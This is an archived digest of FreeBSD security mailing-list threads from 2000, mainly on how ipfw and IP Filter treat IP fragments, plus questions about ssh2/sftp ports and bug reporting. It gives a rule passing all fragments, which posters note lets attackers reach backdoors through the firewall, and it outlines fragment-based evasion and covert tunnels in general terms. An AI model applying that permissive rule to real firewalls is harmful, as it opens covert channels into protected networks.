From owner-freebsd-security Sun Sep 3 1:44:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 8C9F037B424 for ; Sun, 3 Sep 2000 01:44:56 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 01:43:51 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id BAA46286; Sun, 3 Sep 2000 01:44:53 -0700 (PDT) (envelope-from cjc) Date: Sun, 3 Sep 2000 01:44:53 -0700 From: "Crist J . Clark" To: Dragos Ruiu Cc: Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments Message-ID: <20000903014453.H62475@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <007a01c01457$3b9eff80$e4aa603e@gottt> <00090217534118.20066@smp.kyx.net> <20000903023759.O33771@jade.chc-chimes.com> <0009022351571F.20066@smp.kyx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <0009022351571F.20066@smp.kyx.net>; from dr@kyx.net on Sat, Sep 02, 2000 at 11:47:29PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 02, 2000 at 11:47:29PM -0700, Dragos Ruiu wrote: > On Sat, 02 Sep 2000, Bill Fumerola wrote: > > On Sat, Sep 02, 2000 at 05:50:02PM -0700, Dragos Ruiu wrote: > > > > > > > Is there a way to make ipfw to reassemble fragmented ip packets before passing them through the rules? > > > > > > > > No. The relevant bits are only in the first packet. > > > > > > > It could be made to reassemble them, > > > but it would incurr a performance hit. > > > > What do you gain? Nothing that I can think that ipfw currently > > tests for is in the non-initial fragment. > > > > Correct me if I'm wrong because I havent looked at the ipfw source, > but fragment's dont get passed. There are some applications that > like to send big packets (I have a video streaming system for instance > that sends up to 64K UDP datagrams) that will always get fragmented. > If I wanted to send such packets unmolested through ipfw it > would have to "reassemble" them as it were so that once the first > fragment got through the subsequent ones could follow too. > > Or am I missing something here in what you're trying to do? To pass all fragments, # ipfw add pass ip from any to any frag Or you can add specific protocols, source, destination, interface, etc. If you do not add a rule like that, your fragments will generally fall through to the last rule which should be a default deny. Some points from ipfw(8) to remember, Fragmented packets which have a non-zero offset (i.e. not the first fragment) will never match a rule which has one or more port specifications. See the frag option for details on matching fragmented packets. frag Match if the packet is a fragment and this is not the first fragment of the datagram. frag may not be used in conjunction with either tcpflags or TCP/UDP port specifi- cations. There is one kind of packet that the firewall will always discard, that is an IP fragment with a fragment offset of one. This is a valid packet, but it only has one use, to try to circumvent firewalls. Incoming packet fragments diverted by divert or tee are reassembled be- fore delivery to the socket. Reassembling packets in general is only really needed for an application-layer level firewall, which ipfw is not. But as that last point eludes, that kind of blury once you NAT. -- Crist J. Clark cjclark@alum.mit.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 2:55:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id D0EE037B440 for ; Sun, 3 Sep 2000 02:55:52 -0700 (PDT) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id 8453D1DC03; Sun, 3 Sep 2000 02:54:53 -0700 (PDT) From: Dragos Ruiu Organization: kyx.net To: cjclark@alum.mit.edu, "Crist J . Clark" Subject: Re: ipfw and fragments Date: Sun, 3 Sep 2000 02:22:52 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain Cc: Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG References: <007a01c01457$3b9eff80$e4aa603e@gottt> <0009022351571F.20066@smp.kyx.net> <20000903014453.H62475@149.211.6.64.reflexcom.com> In-Reply-To: <20000903014453.H62475@149.211.6.64.reflexcom.com> MIME-Version: 1.0 Message-Id: <0009030256211M.20066@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 03 Sep 2000, Crist J . Clark wrote: > > Or am I missing something here in what you're trying to do? > > To pass all fragments, > > # ipfw add pass ip from any to any frag So I can enble fragmented communications like my UDP video monstergrams through the firewall...ok. There are many reasons why fragments can occur naturally too, like an MTU mismatch along a path, oddball phy links, route changes, or flaps, etc... But this means that to support these packets any fragmented packet can get past your fw. So if I wanted to communicate with my trojan/backdoor on the inside I would just send middle fragments to wake it up and they go through your firewall like ghosts.... :-( > Incoming packet fragments diverted by divert or tee are reassembled be- > fore delivery to the socket. This is good to know... and handy quick and dirty way to get reassembly. Thanks. > > Reassembling packets in general is only really needed for an > application-layer level firewall, which ipfw is not. But as that last > point eludes, that kind of blury once you NAT. Actually IP level fragmentation is definitely not an application layer thing. (I'm not talking about TCP fragmentation.) But I'm quibbling with semantics... My point is just that if you want to really do this appropriately you should tag fragmented head packets that are allowed through and allow subsequent fragments on that dest, port, and id #, and then you should close that hole when you see the end fragment go by, or a timeout occurs. The firewall should not let through any other fragments except those belonging to same datagram(dest,port,id) as allowed head fragment packets. Otherwise, it is either very easy to set up covert channels through your firewalls, or you have to break some spec compliant applications. It is not very difficult to code a packet filter so that it works correctly even for fragments, but you incurr a performance hit, particularly for fragments (lookup), while maybe not much or a negligible overhead for normal traffic. Ok.... now I'm curious, time to look at the ipf and ipfw code.... Does the same behaviour apply to ipf? cheers, --dr -- dursec.com ltd. / kyx.net - we're from the future pgp fingerprint: 18C7 E37C 2F94 E251 F18E B7DC 2B71 A73E D2E8 A56D pgp key: http://www.dursec.com/drkey.asc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 6:58: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 41D4D37B424 for ; Sun, 3 Sep 2000 06:58:00 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id JAA69567; Sun, 3 Sep 2000 09:57:35 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sun, 3 Sep 2000 09:57:35 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Dragos Ruiu Cc: cjclark@alum.mit.edu, "Crist J . Clark" , Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments In-Reply-To: <0009030256211M.20066@smp.kyx.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 3 Sep 2000, Dragos Ruiu wrote: > But this means that to support these packets any fragmented > packet can get past your fw. So if I wanted to communicate > with my trojan/backdoor on the inside I would just send middle > fragments to wake it up and they go through your firewall > like ghosts.... :-( And I believe there are even tools available to do this, encapsulating IP in fragments to allow a tunnel to be created. > > Reassembling packets in general is only really needed for an > > application-layer level firewall, which ipfw is not. But as that last > > point eludes, that kind of blury once you NAT. > > Actually IP level fragmentation is definitely not an application > layer thing. (I'm not talking about TCP fragmentation.) But I'm > quibbling with semantics... However, reassembly does fit more into the application-layer environment, as for stateless IP-layer firewalls, there are few reasons to perform reassembly. > My point is just that if you want to really do this appropriately > you should tag fragmented head packets that are allowed through > and allow subsequent fragments on that dest, port, and id #, > and then you should close that hole when you see the end > fragment go by, or a timeout occurs. The firewall should > not let through any other fragments except those belonging > to same datagram(dest,port,id) as allowed head fragment > packets. Otherwise, it is either very easy to set up covert > channels through your firewalls, or you have to break some > spec compliant applications. My recollection was that fragments can be created that do not contain all of the transport-layer headers. For example, although it should not occur, ``naturally,'' it is possible to fragment a packet immediately after the IP header but before the TCP-level port information is include. Similarly, later fragments may begin at arbitrary points in the datagram, based on how the PMTU caused the fragmentation at various points on the path. Therefore, incoming fragments may not have the port information you refer to in this paragraph: the only information available will be {IP source, destination, IP ID} plus some offset information, although due to multi-path routing, it is entirely possible to end up with overlapping fragments later in the packet. In fact, a number of spiffy firewall traversal techniques take advantage of this. ipfw does not currently drop packets with a first fragment smaller than the minimum IP MTU, or later fragments that overlap the first minimum IP MTU. It should do so to thwart a number of overlapping reassembly attacks. The check for a fragment beginning at offset "1" is cute, but in practice wouldn't stop an attacker writing their own tools. > It is not very difficult to code a packet filter so that it works > correctly even for fragments, but you incurr a performance hit, > particularly for fragments (lookup), while maybe not much or a > negligible overhead for normal traffic. Ok.... now I'm curious, > time to look at the ipf and ipfw code.... Introducing state on a high-speed firewall hurts. If it can be avoided, you want to do that. If not.. well, you accept the consequences, but remember that any storage of state is an opportunity for denial of service, both due to the lookup performance hit, and the potential for state exhaustion. Agressive dropping of questionable fragments helps thwart a number of attacks, and should be used. Fundamentally, I think you'll find that blocking trojan horse communication is impossible if you allow any communication through at all. IP tunneling via DNS queries, SMTP mail service, fragments, and TCP negotiation options have all been demonstrated; preventing information leaking is effectively impossible, although you can lower the bandwidth. Instead, concentrate on limiting the opportunities for placing trojans within your infrastructure, and detecting when they do happen. > Does the same behaviour apply to ipf? Darren Reed will be able to best answer this question, and presumably will do so. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 10:28:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 806D437B423; Sun, 3 Sep 2000 10:28:12 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id LAA16320; Sun, 3 Sep 2000 11:27:47 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id LAA03881; Sun, 3 Sep 2000 11:27:46 -0600 (MDT) (envelope-from nate) Date: Sun, 3 Sep 2000 11:27:46 -0600 (MDT) Message-Id: <200009031727.LAA03881@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Robert Watson Cc: Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments In-Reply-To: References: <0009030256211M.20066@smp.kyx.net> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > My recollection was that fragments can be created that do not contain all > of the transport-layer headers. For example, although it should not > occur, ``naturally,'' it is possible to fragment a packet immediately > after the IP header but before the TCP-level port information is include. > Similarly, later fragments may begin at arbitrary points in the datagram, > based on how the PMTU caused the fragmentation at various points on the > path. Actually, isn't the purpose of PMTU to avoid the need to fragment the packet at intermediate routers? Since PMTU involves both endpoints of the link, thus allowing the originator to determine *if* a packet of a particular size can make it all the way from one end to the other w/out fragmentation. It seems that fragmentation is a real problem for stateless firewalls, but is a real problem that should be considered, especially since our existing IPFW is semi-stateful now. :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 10:47:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from ibb0021.ibb.uu.nl (ibb0021.ibb.uu.nl [131.211.124.21]) by hub.freebsd.org (Postfix) with ESMTP id 7430737B423; Sun, 3 Sep 2000 10:47:11 -0700 (PDT) Received: by ibb0021.ibb.uu.nl (Postfix) id AA8CC7B3; Sun, 3 Sep 2000 19:46:12 +0200 (CEST) Date: Sun, 3 Sep 2000 19:46:11 +0200 From: Mipam To: Nate Williams Cc: Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments Message-ID: <20000903194611.A10607@ibb0021.ibb.uu.nl> Reply-To: mipam@ibb.net References: <0009030256211M.20066@smp.kyx.net> <200009031727.LAA03881@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009031727.LAA03881@nomad.yogotech.com>; from nate@yogotech.com on Sun, Sep 03, 2000 at 11:27:46AM -0600 X-Obviously: All email clients suck. Only Mutt sucks less! X-Editor: Vi X-Operating-System: BSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Actually, isn't the purpose of PMTU to avoid the need to fragment the > packet at intermediate routers? Since PMTU involves both endpoints of > the link, thus allowing the originator to determine *if* a packet of a > particular size can make it all the way from one end to the other w/out > fragmentation. > As far as i can tell, it is :) Nice link for this: http://www.cis.ohio-state.edu/rfc/rfc1191.txt With other words, rfc 1191 has nice info about it. I guess this is another good reason to allow icmp, especially type 3 code 4. Now, i came to icmp again, a remark on the icmp discussion from latest time. No need to explicitly specify to allow icmp type 0 on ipf. Icmp state keeping will result in the answer comming through on the initial icmp type 8. That is, i never experienced trouble doing it this way. That doesnt mean that it's allright. Maybe there are circumstanses in which you wish to explicitly allow icmp type 0 to come in, in which case i'd like to hear about it :) Bye, Mipam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 12:20:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 7941137B424 for ; Sun, 3 Sep 2000 12:20:12 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 12:19:08 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id MAA49473; Sun, 3 Sep 2000 12:20:10 -0700 (PDT) (envelope-from cjc) Date: Sun, 3 Sep 2000 12:20:10 -0700 From: "Crist J . Clark" To: Dragos Ruiu Cc: Bill Fumerola , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments Message-ID: <20000903122010.K62475@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <007a01c01457$3b9eff80$e4aa603e@gottt> <0009022351571F.20066@smp.kyx.net> <20000903014453.H62475@149.211.6.64.reflexcom.com> <0009030256211M.20066@smp.kyx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <0009030256211M.20066@smp.kyx.net>; from dr@kyx.net on Sun, Sep 03, 2000 at 02:22:52AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Sep 03, 2000 at 02:22:52AM -0700, Dragos Ruiu wrote: > On Sun, 03 Sep 2000, Crist J . Clark wrote: [snip] > Actually IP level fragmentation is definitely not an application > layer thing. (I'm not talking about TCP fragmentation.) But I'm > quibbling with semantics... No it occurs at the IP layer of course, but it typically is only of interest when the firewall is actually examining the contents of the packets, and that usually only happens in application layer firewalls. > My point is just that if you want to really do this appropriately > you should tag fragmented head packets that are allowed through > and allow subsequent fragments on that dest, port, and id #, > and then you should close that hole when you see the end > fragment go by, or a timeout occurs. The firewall should > not let through any other fragments except those belonging > to same datagram(dest,port,id) as allowed head fragment > packets. Otherwise, it is either very easy to set up covert > channels through your firewalls, or you have to break some > spec compliant applications. Sounds easier than it is. There is no guarantee that fragments with the tranport layer information will be the first ones there for example. And there is my personal favorite, you can fragment fragments. It's really easy to DOS a firewall if you're not _really_ careful. Just ask Checkpoint. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 13:11: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 804E237B424; Sun, 3 Sep 2000 13:10:57 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id HAA15013; Mon, 4 Sep 2000 07:10:46 +1100 (EST) From: Darren Reed Message-Id: <200009032010.HAA15013@cairo.anu.edu.au> Subject: Re: ipfw and fragments To: rwatson@FreeBSD.ORG (Robert Watson) Date: Mon, 4 Sep 2000 07:10:46 +1100 (Australia/NSW) Cc: dr@kyx.net (Dragos Ruiu), cjclark@alum.mit.edu, cjclark@reflexnet.net (Crist J . Clark), billf@chimesnet.com (Bill Fumerola), list@rachinsky.de (Nicolas), freebsd-security@FreeBSD.ORG In-Reply-To: from "Robert Watson" at Sep 03, 2000 09:57:35 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Robert Watson, sie said: [...] > > Does the same behaviour apply to ipf? > > Darren Reed will be able to best answer this question, and presumably will > do so. Damn I'd been not reading this thread at all until your email, Robert :-) What does IP Filter do with fragments ? That a packet is a fragment is a filterable atttribute. You can also tell it to remember "state information" triggered by the fragment with offset == 0. It never reassembles and doesn't hold them in a buffer until they're all received either. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 13:26:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from falcon.prod.itd.earthlink.net (falcon.prod.itd.earthlink.net [207.217.120.74]) by hub.freebsd.org (Postfix) with ESMTP id 7FCF037B423 for ; Sun, 3 Sep 2000 13:26:50 -0700 (PDT) Received: from earthlink.net (ip157.charleston3.sc.pub-ip.psi.net [38.30.242.157]) by falcon.prod.itd.earthlink.net (8.9.3-EL_1_3/8.9.3) with ESMTP id NAA26821; Sun, 3 Sep 2000 13:26:31 -0700 (PDT) Message-ID: <39B2B33A.EC657BD3@earthlink.net> Date: Sun, 03 Sep 2000 16:23:22 -0400 From: Jeff Evarts Organization: Riventree X-Mailer: Mozilla 4.08 [en] (X11; I; OpenBSD 2.7 i386) MIME-Version: 1.0 To: lidl@pix.net Subject: What level of bug is worth reporting? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, This is really a question about what-level-of-bug-is-worth-reporting. This is what I found: IF ( Obscure-Service-X is turned on in Open/Free/Net-BSD ) [Haven't checked BSD/OS] THEN Any local user can set the access time of any file to the current time Any local user can set the mode of any tty device to rw------, whether it's in use or not ENDIF Both of these seem like potential DOS problems to me, though I cannot think of any way to exploit them to become root or anything, and the code in question has worked the way it does for over 2 years. Is a "problem" like this worth reporting, or does it just make you look like a nitpicker? -Jeff Evarts --riventree@earthlink.net ---http://www.ecst.csuchico.edu/~amarth/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 13:37:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 3F56E37B422 for ; Sun, 3 Sep 2000 13:37:21 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id UAA04791; Sun, 3 Sep 2000 20:32:26 GMT Date: Sun, 3 Sep 2000 20:32:25 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: CrazZzy Slash Cc: freebsd-security@FreeBSD.ORG Subject: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear All, Thanx to your help successfully installed ssh2. Now i am confused about one thing. When I use ssh2 or sftp I see that they use the same port number which is 22. Hum?, my question is: How to distinguish between the two applications ssh2 and sftp? is there anyway for me to assign sftp another port number, say 199 ? I thank you in Advance Ali Alaoui El Hassani On Sun, 20 Aug 2000, CrazZzy Slash wrote: > Hi, > > Install /usr/ports/security/ssh2. > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote: > > Dear all, > I need to install > stlenet, sftp , shttp on a FreeBsd 3.3 > > any Help? > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 14:31:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 3CF6937B422; Sun, 3 Sep 2000 14:31:37 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 9A4F21C41; Sun, 3 Sep 2000 17:31:36 -0400 (EDT) Date: Sun, 3 Sep 2000 17:31:36 -0400 From: Bill Fumerola To: Darren Reed Cc: Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments Message-ID: <20000903173136.S33771@jade.chc-chimes.com> References: <200009032010.HAA15013@cairo.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200009032010.HAA15013@cairo.anu.edu.au>; from avalon@coombs.anu.edu.au on Mon, Sep 04, 2000 at 07:10:46AM +1100 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 04, 2000 at 07:10:46AM +1100, Darren Reed wrote: > It never reassembles and doesn't hold them in a buffer until they're > all received either. Which I still think is the proper behavior for both ipfw and ipfilter. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 15: 1:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 5B25F37B424 for ; Sun, 3 Sep 2000 15:01:31 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 15:00:28 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id PAA61010; Sun, 3 Sep 2000 15:01:29 -0700 (PDT) (envelope-from cjc) Date: Sun, 3 Sep 2000 15:01:29 -0700 From: "Crist J . Clark" To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? Message-ID: <20000903150129.M62475@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Sun, Sep 03, 2000 at 08:32:25PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Sep 03, 2000 at 08:32:25PM +0000, Ali Alaoui El Hassani wrote: > Dear All, > Thanx to your help successfully installed ssh2. Now i am confused about > one thing. When I use ssh2 or sftp I see that they use the same port > number which is 22. Hum?, my question is: > How to distinguish between the two applications ssh2 and sftp? > is there anyway for me to assign sftp another port number, say 199 ? Both ssh2 and sftp are talking to the same daemon on the remote host. That's why they connect to the same port. You can use other ports, but why? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 15: 2:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 56F9137B43C for ; Sun, 3 Sep 2000 15:02:10 -0700 (PDT) Received: (qmail 61615 invoked by uid 1001); 3 Sep 2000 21:59:15 -0000 Date: Mon, 4 Sep 2000 00:59:15 +0300 From: Peter Pentchev To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? Message-ID: <20000904005915.A61559@ringwraith.office1.bg> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Sun, Sep 03, 2000 at 08:32:25PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Sep 03, 2000 at 08:32:25PM +0000, Ali Alaoui El Hassani wrote: > Dear All, > Thanx to your help successfully installed ssh2. Now i am confused about > one thing. When I use ssh2 or sftp I see that they use the same port > number which is 22. Hum?, my question is: > How to distinguish between the two applications ssh2 and sftp? > is there anyway for me to assign sftp another port number, say 199 ? Not unless you choose to run another instance of sshd listening on port 199. sftp is not a separate service per se, it works by establishing an SSH connection (it requires that you login via SSH, or some kind of rhosts/shosts, but definitely some kind of SSH authentication), and then executing a server program on the side you are connecting to. Actually, sftp *executes* the ssh client at the client side (which is why it has an option to pass ssh options, like an identity file and such), so it pretty much expects the client to have a server to connect to. In theory, the SSH server could be recompiled so that it specifically does *not* allow execution of the sftp server, and placed to listen on port 22, and then a not-hacked version placed to listen on port 199, possibly made so it can *only* execute sftp.. but I, personally, do not really think it is worth the trouble. G'luck, Peter -- This sentence contains exactly threee erors. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 15:13:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 9DE5437B424 for ; Sun, 3 Sep 2000 15:13:38 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA05450; Sun, 3 Sep 2000 22:08:50 GMT Date: Sun, 3 Sep 2000 22:08:49 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: Peter Pentchev Cc: CrazZzy Slash , freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers continue..... In-Reply-To: <20000904005915.A61559@ringwraith.office1.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear All, My wonder is that since sftp and ssh use the same port number 22. So how do they get dispatched at the level of tcp to the receiving applicatons sftp and ssh of remote host ? Ali. On Mon, 4 Sep 2000, Peter Pentchev wrote: > On Sun, Sep 03, 2000 at 08:32:25PM +0000, Ali Alaoui El Hassani wrote: > > Dear All, > > Thanx to your help successfully installed ssh2. Now i am confused about > > one thing. When I use ssh2 or sftp I see that they use the same port > > number which is 22. Hum?, my question is: > > How to distinguish between the two applications ssh2 and sftp? > > is there anyway for me to assign sftp another port number, say 199 ? > > Not unless you choose to run another instance of sshd listening on > port 199. > > sftp is not a separate service per se, it works by establishing an SSH > connection (it requires that you login via SSH, or some kind of rhosts/shosts, > but definitely some kind of SSH authentication), and then executing a server > program on the side you are connecting to. Actually, sftp *executes* > the ssh client at the client side (which is why it has an option to pass > ssh options, like an identity file and such), so it pretty much expects > the client to have a server to connect to. > > In theory, the SSH server could be recompiled so that it specifically does > *not* allow execution of the sftp server, and placed to listen on port 22, > and then a not-hacked version placed to listen on port 199, possibly made > so it can *only* execute sftp.. but I, personally, do not really think > it is worth the trouble. > > G'luck, > Peter > > -- > This sentence contains exactly threee erors. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 15:27: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 8FCA437B43C for ; Sun, 3 Sep 2000 15:27:03 -0700 (PDT) Received: (qmail 61762 invoked by uid 1001); 3 Sep 2000 22:24:07 -0000 Date: Mon, 4 Sep 2000 01:24:07 +0300 From: Peter Pentchev To: Ali Alaoui El Hassani 